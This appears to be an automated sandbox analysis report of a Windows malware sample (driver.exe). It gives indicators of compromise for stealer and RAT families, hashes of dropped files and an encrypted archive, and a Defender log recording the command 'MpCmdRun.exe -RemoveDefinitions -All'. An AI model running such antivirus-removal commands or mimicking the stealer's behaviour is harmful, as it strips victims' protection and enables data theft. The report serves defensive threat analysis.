Behavior and APIs

Time	Type	Description
05:00:08	API Interceptor	161x Sleep call for process: powershell.exe modified
05:00:09	API Interceptor	5x Sleep call for process: WMIC.exe modified
05:00:13	API Interceptor	2x Sleep call for process: svchost.exe modified
05:00:19	API Interceptor	3x Sleep call for process: SIHClient.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	XClient.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Comprobante.de.pago.pdf.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	p.exe	Get hash	malicious	Unknown	Browse	ip-api.com/csv/?fields=query
	rNuevaorden_pdf.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	I334hDwRjj.exe	Get hash	malicious	Blank Grabber, Njrat	Browse	ip-api.com/json/?fields=225545
	startup_str_466.bat	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	7dtpow.ps1	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	x.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	TR98760H.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse	ip-api.com/json/?fields=225545
162.159.137.232	I334hDwRjj.exe	Get hash	malicious	Blank Grabber, Njrat	Browse
	paint.exe	Get hash	malicious	Blank Grabber	Browse
	hkMUtKbCqV.exe	Get hash	malicious	Unknown	Browse
	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse
	rename_me_before.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	Bloxflip Predictor.exe	Get hash	malicious	Njrat	Browse
	phost.exe	Get hash	malicious	Blank Grabber	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	I334hDwRjj.exe	Get hash	malicious	Blank Grabber, Njrat	Browse	162.159.137.232
	random.exe	Get hash	malicious	CStealer	Browse	162.159.128.233
	random.exe	Get hash	malicious	CStealer	Browse	162.159.136.232
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse	162.159.135.232
	P3A946MOFP.exe	Get hash	malicious	XWorm	Browse	162.159.128.233
	paint.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	hkMUtKbCqV.exe	Get hash	malicious	Unknown	Browse	162.159.137.232
	X9g8L63QGs.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	KpHYfxnJs6.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
ip-api.com	XClient.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Comprobante.de.pago.pdf.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	p.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	rNuevaorden_pdf.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	I334hDwRjj.exe	Get hash	malicious	Blank Grabber, Njrat	Browse	208.95.112.1
	startup_str_466.bat	Get hash	malicious	XWorm	Browse	208.95.112.1
	7dtpow.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	x.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	TR98760H.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	XClient.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	http://www.efnhdh.blogspot.mk/	Get hash	malicious	GRQ Scam	Browse	172.67.12.83
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	http://pdfdrive.com.co	Get hash	malicious	Unknown	Browse	104.21.11.245
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t	Get hash	malicious	Unknown	Browse	172.66.43.95
	http://www.singhs.lv	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.18.11.207
	http://18ofcontents.shop	Get hash	malicious	Unknown	Browse	104.21.96.1
	https://www.dcamarketintelligence.com/tdt	Get hash	malicious	Unknown	Browse	104.26.15.92
	1162-201.exe	Get hash	malicious	FormBook	Browse	104.21.64.1
TUT-ASUS	XClient.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Comprobante.de.pago.pdf.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	p.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	rNuevaorden_pdf.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	I334hDwRjj.exe	Get hash	malicious	Blank Grabber, Njrat	Browse	208.95.112.1
	startup_str_466.bat	Get hash	malicious	XWorm	Browse	208.95.112.1
	7dtpow.ps1	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	x.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	TR98760H.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse	208.95.112.1

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8306905272278405
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugt:gJjJGtpTq2yv1AuNZRY3diu8iBVqFP
MD5:	769659D1022FB33632A276BE982BF6DB
SHA1:	DF3B373A0178BEC8B67D87EE91C0548B8AE06B78
SHA-256:	364BF3FF16A41AB0E80752D3097E4672276E91D51D1C43B036AB8F2473C1D839
SHA-512:	11703A0C42F7D5257A0B34C7CE938976D120E801CB35295E349647C469C3078DAE6FC18994A6CB1A683088BB60A648F97E00F831749B27863F7042A7DD3E9AAD
Malicious:	false
Reputation:	unknown
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe46831d3, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6584842840997771
Encrypted:	false
SSDEEP:	1536:ZSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Zaza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	EADACE6927DBB24BDC93B63142B365CE
SHA1:	6EB6D5BA442F4214AE75FC47230590FCB4E93CFF
SHA-256:	2168FE7E8DFB843746467DBEF3927FAB188FACF380A701EE85D3FEF3B49C29D0
SHA-512:	EA81EBC3B2BC0A4B945E4D2ED24757506AE8DC4C8C413E2FB16010160594EFBDBF8E98C8E89C2D21072EF531D6EA908A69F1FFE6E78D352C98135766651994D8
Malicious:	false
Reputation:	unknown
Preview:	.h1.... ...............X\...;...{......................0.z..........{.......}..h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...................................7.z.....}C..................._......}#..........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07818325833862963
Encrypted:	false
SSDEEP:	3:s/llKYef+YaVGuAJkhvekl1i6pillrekGltll/SPj:sXKzf+Y0rxlQCGJe3l
MD5:	8DAFF965988B490CCCC926C98B38B83A
SHA1:	62623C854639E46BBFDBED5969DD31CC435202B9
SHA-256:	8DBA680B19595322D13E56CB3EDA605B90429771508E99EDE096BE1D505E2F80
SHA-512:	6E4280A8DBD84CA6DAA335F4A25829EEEA8D93699A864CF4B4620EE98B70F0EA76295AFB1060046A21701922455189B8D9FAC8C25E319896EFC713682C862146
Malicious:	false
Reputation:	unknown
Preview:	.\u......................................;...{.......}#......{...............{.......{...XL......{...................._......}#.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ??? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	691342
Entropy (8bit):	7.925039327654425
Encrypted:	false
SSDEEP:	12288:dIOFn+u1KSFgR8F4ORGQB9j2xQPHOVeVD495t359joxd0vfZ8sqQH1TSks1ELtgd:Smk7aUQBIxmuVeVD49zEd0v+3QVT5ta3
MD5:	12F0E375FD009BF03284B01686610ED0
SHA1:	67F8CAF68D65AEEA56CA1FFF4092CC22CFC76752
SHA-256:	2B6F46C447B431AE40E054821B63C3B6CC68F53810ABA8DDAD41AA702AD9EA3A
SHA-512:	9F65287A1E3B1FB2943C7B7DDFFD7143522DDEEB56272121E4667B10EB3C309000ECC897FA8B8F459953A67C097D85917E74FF84625C9B53062886AE958DDAF0
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU.......TWW..}}...]e..GWU.......h..K$...b*s.Q..E%H.1`..(..Dr..H..... ...=....[c?+..9...1..<c...9V.}=c.N..g...T...C..F...Nyz(....I.;,2g._......N.E/..E....{M..8.:~..qOT..?.a..$.......\|...b...g.[3\|..5Jg.##1u.xl .O.s.0u......P......p;......HL.6w..\|.ej.t?..........?.(..7.S...;o:...e.#.VS..g....=.........Hg.....2..;..w..{no..HL.{nt.u.@.....'5.L....S.Hu.....L.m0K..W...z.@....z.3.o..:.G=.[.[2e...k..ps;.Z.z......xc...n....~7T.}.....j.~7.bz..2S.\.Gb>W....,Mu.5gt........j.....).=S)?.W..S<.t.tV.k...k2ZO.ym.[......{^]M...s.,}..-...[..5..7..=R. vO......WU.]..:;_....!}...ZP.t.k...fy...Ku..K.......tNw.....y.%.a..WVKwI.6...).v.<...6.b.k..s..k............y..!}../.L.pI....-.a........\.t..3KvJ...../O?.../...<j......3..a.5..a...6...Om....6..55..>LosI..#6.u:w...[^\Mm.<_.M...b../j.c.K.N...t.{..o..l.r[..i.z...n.......91.....m..<..yg......&..j.y\|.9}.

C:\Users\user\AppData\Local\Temp\Ffb7z.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	724526
Entropy (8bit):	7.999731553052636
Encrypted:	true
SSDEEP:	12288:XYZQI7eD9TVCPHiKysTf6xoD0B2JyXx0/6lZMEg/onUL9jhmrDG7v7+IN2ZwHoYa:XqQI7cTIPtr9DvyxJbMEgwnUL9jU/w7M
MD5:	535AA3CCC803D9976BC7590BAE5721B3
SHA1:	5C00538138C228419820AFDFCB4F14D396EBC0B5
SHA-256:	63DCF295E1AC64ECBD8460CBD8BFC75C605A27CCC53E2C03ED8BF3BF0F566D5A
SHA-512:	99B1FB360620B085CDC6E49F6D6428BB90160EE23AF6ACA42C9AFBE5150D709EF767CDBF56EA1EED9A08272DA66C5CC9F9284DE24B0625B51FF98751AFDCEFB7
Malicious:	true
Reputation:	unknown
Preview:	Rar!........!.......I(.qx..d=&,P...{.....qa0...c...c4...V/7A.[...M.j.H...6 E"8/...C........As.B.f.r...."..D.C..b.b...P..7Hg...jZT..\o. .k......;4^&`.d...4L5..^..d~N.).......a....\('U..2k{lbd....7.8..P}.B.:n..G...Z..E..Q.%.....6.,X].#.g.{3..p~.........<.l....=H.r.ty.....u....$...3..p.~,p.-.B>.=..."..)..S..).F.P.]-...........[.N.SD.Pz.s..,.(..8..Y!b......l.KZ.2..6..3....B....:f....p_R.l.6.2.L.i....j....0&.....u........j+. ..^.l4....1..8...Cf.Y......PO%.0`3..rgYx.z"...J...J.....li.D.......k....}....i.G.....k.E...-V.J{..U.T_:.AR y....'.T4....8...Q...!(..7kc1..$..4."..@.T.~..,.YrC.>...c....0.i...u.Rm.xh..}R.&.pu.%8\|wZ........M....y.....C.?O.&!.i:...X$^.d5..M.l.S.5...#Q.M.c......\|...b.....B.#@.j.v,.B;...3I........H6.[Xt....)..[...e4..IJ.zz .c.x.F...)i...w0m..8Jh.}u2.7.....A......./....#.......Yi.gS.l~.....K....... .^ C.v....~..........(1.SX.....}.._{;a.w"w...61.cV.'..*...\|.q...]HL..3r...pa.\|<P...s...0i..........=....

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.101257634177589
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrntk9+MlWlLehW51ICaM:QOaqdmOFdjrnS+kWResLIfM
MD5:	262E1BB39296B54C4D1E63A5651B691B
SHA1:	73AC4274BAF2969443C2B1F407D21C0023B257CD
SHA-256:	A30C784BA0622BCD7FF1EA079FFB90C318FDA502C5533A63BAC4E4077FA6E014
SHA-512:	843B9345031D053E2E5608BA2E47770E88E616C22DAD1B0C5984CED5A7B477E87532633B53533D2EB9292E07193263B4086367D5857C5A85A67B064440C506A9
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. J.a.n. .. 1.0. .. 2.0.2.5. .0.5.:.0.0.:.2.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. J.a.n. .. 1.0. .. 2.0.2.5. .0.5.:.0.0.:.2.4.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RESF5CD.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ba, 9 symbols, created Fri Jan 10 11:44:43 2025, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1376
Entropy (8bit):	4.130758400968359
Encrypted:	false
SSDEEP:	24:HBO9gEQctHDwK9GoYNII+ycuZhNfakSRPNnqSQEgd:hELt0KZYu1ulfa3jqSZ0
MD5:	5218D9E30B9B60A298657EF500D61223
SHA1:	EF88B0BD3C66FB3D3C46780F1BD1D84911DA736C
SHA-256:	4683E73366E883A0A9A85946AE520F8398BD35D9E1812CBD4421039D4FC66DBD
SHA-512:	29B7AC360A9CBEEF73D26E10279D7CAE6A32C1A712EEF18337A422AFA32C75CFD75764DF256ABA11DCD6DFF9E1C3194026F9D8F363661ACB208A841AB44FCF5C
Malicious:	false
Reputation:	unknown
Preview:	L...+..g.............debug$S........\|...................@..B.rsrc$01........X.......`...........@..@.rsrc$02........P...j...............@..@........U....c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP....................-..s.F..\.,Zu..........5.......C:\Users\user\AppData\Local\Temp\RESF5CD.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.4.g.v.4.h.o.x...d.l.l.....(.....L.e.

C:\Users\user\AppData\Local\Temp\_MEI57082\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	51192
Entropy (8bit):	7.762871670400831
Encrypted:	false
SSDEEP:	1536:fTvumeSe2uD4e4elA5woMImLVQhyUzR9AfIIoT:LvxeSeVd4elAqImLVQLX
MD5:	E1B31198135E45800ED416BD05F8362E
SHA1:	3F5114446E69F4334FA8CDA9CDA5A6081BCA29ED
SHA-256:	43F812A27AF7E3C6876DB1005E0F4FB04DB6AF83A389E5F00B3F25A66F26EB80
SHA-512:	6709C58592E89905263894A99DC1D6AAFFF96ACE930BB35ABFF1270A936C04D3B5F51A70FB5ED03A6449B28CAD70551F3DCCFDD59F9012B82C060E0668D31733
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4@..4@..4@..L...4@..A..4@....4@..C..4@..D..4@..E..4@.v.A..4@..A..4@..4A.4@.v.M..4@.v.@..4@.v....4@.v.B..4@.Rich.4@.................PE..d....WOg.........." ...*.............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65016
Entropy (8bit):	7.844438023002735
Encrypted:	false
SSDEEP:	1536:sgnr/ptw33m0QDInUz2fH3JrlFCFfLaImyP7TyUzR9zfIP0:fnrhtoW0QSu+EFfWImyP7UM
MD5:	B6262F9FBDCA0FE77E96A9EED25E312F
SHA1:	6BFB59BE5185CEACA311F7D9EF750A12B971CBD7
SHA-256:	1C0F9C3BDC53C2B24D5480858377883A002EB2EBB57769D30649868BFB191998
SHA-512:	768321758FC78E398A1B60D9D0AC6B7DFD7FD429EF138845461389AAA8E74468E4BC337C1DB829BA811CB58CC48CFFF5C8DE325DE949DDE6D89470342B2C8CE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8.Z.\|.4.\|.4.\|.4.u...z.4.m.5.~.4.m.7.x.4.m.0.t.4.m.1.p.4...5.~.4..x0.}.4..x5.z.4...5...4.\|.5...4...9.z.4...4.}.4....}.4...6.}.4.Rich\|.4.........PE..d....WOg.........." ...*.............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	122088
Entropy (8bit):	7.904008472378221
Encrypted:	false
SSDEEP:	1536:B3UVX099NzjRjBmFTSki6cbA8VDEcZJDY/LB7cMvVPcc1di9ImvqxEMmTyUzR98K:B3UWVzVjp6cb+SqOMtPc9ImvqxExn
MD5:	9CFB6D9624033002BC19435BAE7FF838
SHA1:	D5EECC3778DE943873B33C83432323E2B7C2E5C2
SHA-256:	41B0B60FE2AA2B63C93D3CE9AB69247D440738EDB4805F18DB3D1DAA6BB3EBFF
SHA-512:	DD6D7631A54CBD4ABD58B0C5A8CB5A10A468E87019122554467FD1D0669B9A270650928D9DE94A7EC059D4ACEBF39FD1CFCEA482FC5B3688E7924AAF1369CC64
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\lUT..;...;...;..u....;...:...;...8...;...?...;...>...;...:...;.j.:...;...:...;...8...;...6...;...;...;.......;...9...;.Rich..;.........................PE..d....WOg.........." ...*.....0.......p....................................................`......................................................................+..........\........................................\|..@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37368
Entropy (8bit):	7.62885373795624
Encrypted:	false
SSDEEP:	768:WzzaDWoin9vvSfhb8pnTImvI9qJyUFRYT2Ip4ygCxf1mlzzF:WzOW6JQTImvI9WyUzR9yRfIPF
MD5:	0B214888FAC908AD036B84E5674539E2
SHA1:	4079B274EC8699A216C0962AFD2B5137809E9230
SHA-256:	A9F24AD79A3D2A71B07F93CD56FC71958109F0D1B79EEBF703C9ED3AC76525FF
SHA-512:	AE7AEE8A11248F115EB870C403DF6FC33785C27962D8593633069C5FF079833E76A74851EF51067CE302B8EA610F9D95C14BE5E62228EBD93570C2379A2D4846
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.A..............K.............................................x.........................................'.............Rich............PE..d....WOg.........." ...*.P..........@........................................@............`.........................................\|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	89592
Entropy (8bit):	7.901406061659478
Encrypted:	false
SSDEEP:	1536:+E29OZvi4bwTlI+rWNp+UavNhym9PcIbiQZWL22eMBYqj8uyDM/2Im01rqyUzR9u:+MviSJj+JymBBBZIheEjMoOIm01rtWO
MD5:	ADEAA96A07B7B595675D9F351BB7A10C
SHA1:	484A974913276D236CB0D5DB669358E215F7FCED
SHA-256:	3E749F5FAD4088A83AE3959825DA82F91C44478B4EB74F92387FF50FF1B8647D
SHA-512:	5D01D85CDA1597A00B39746506FF1F0F01EEEA1DC2A359FCECC8EE40333613F7040AB6D643FDAEE6ADAA743D869569B9AB28AE56A32199178681F8BA4DEA4E55
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..C~...~...~...w.?.z...o3..\|...o3..}...o3..v...o3..r....3..}....4..\|...~........3..D....3.......3S......3......Rich~...........PE..d....WOg.........." ...*. .......p........................................................`.........................................4...L....................0.........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29552
Entropy (8bit):	7.411884404531348
Encrypted:	false
SSDEEP:	768:3e8XPAVnB8JpeEIm9UtEJyUFRYT2Ip4mTxf1mlBqsovFfY:TgB8CEIm9Ut4yUzR9GfIQsotfY
MD5:	766820215F82330F67E248F21668F0B3
SHA1:	5016E869D7F65297F73807EBDAF5BA69B93D82BD
SHA-256:	EF361936929B70EF85E070ED89E55CBDA7837441ACAFEEA7EF7A0BB66ADDEEC6
SHA-512:	4911B935E39D317630515E9884E6770E3C3CDBD32378B5D4C88AF22166B79B8EFC21DB501F4FFB80668751969154683AF379A6806B9CD0C488E322BD00C87D0E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.............s......m.......m.......m.......m......{m.......j..............{m......{m......{m......{m......Rich............PE..d....WOg.........." ...*.0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI57082\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\driver.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	46584
Entropy (8bit):	7.708630278879131
Encrypted:	false
SSDEEP:	768:pOVO07RbhED2LEIuo4OCYkbaEts+Z85iEsaAEwAptjvImywAmmJyUFRYT2Ip4Ep5:GPkD2LEIuo4E5CpZEbjvImywAmKyUzRs
MD5:	65CD246A4B67CC1EAB796E2572C50295
SHA1:	053FA69B725F1789C87D0EF30F3D8997D7E97E32
SHA-256:	4ECD63F5F111D97C2834000FF5605FAC61F544E949A0D470AAA467ABC10B549C
SHA-512:	C5BF499CC3038741D04D8B580B54C3B8B919C992366E4F37C1AF6321A7C984B2E2251C5B2BC8626AFF3D6CA3BF49D6E1CCD803BD99589F41A40F24EC0411DB86
Malicious:	false
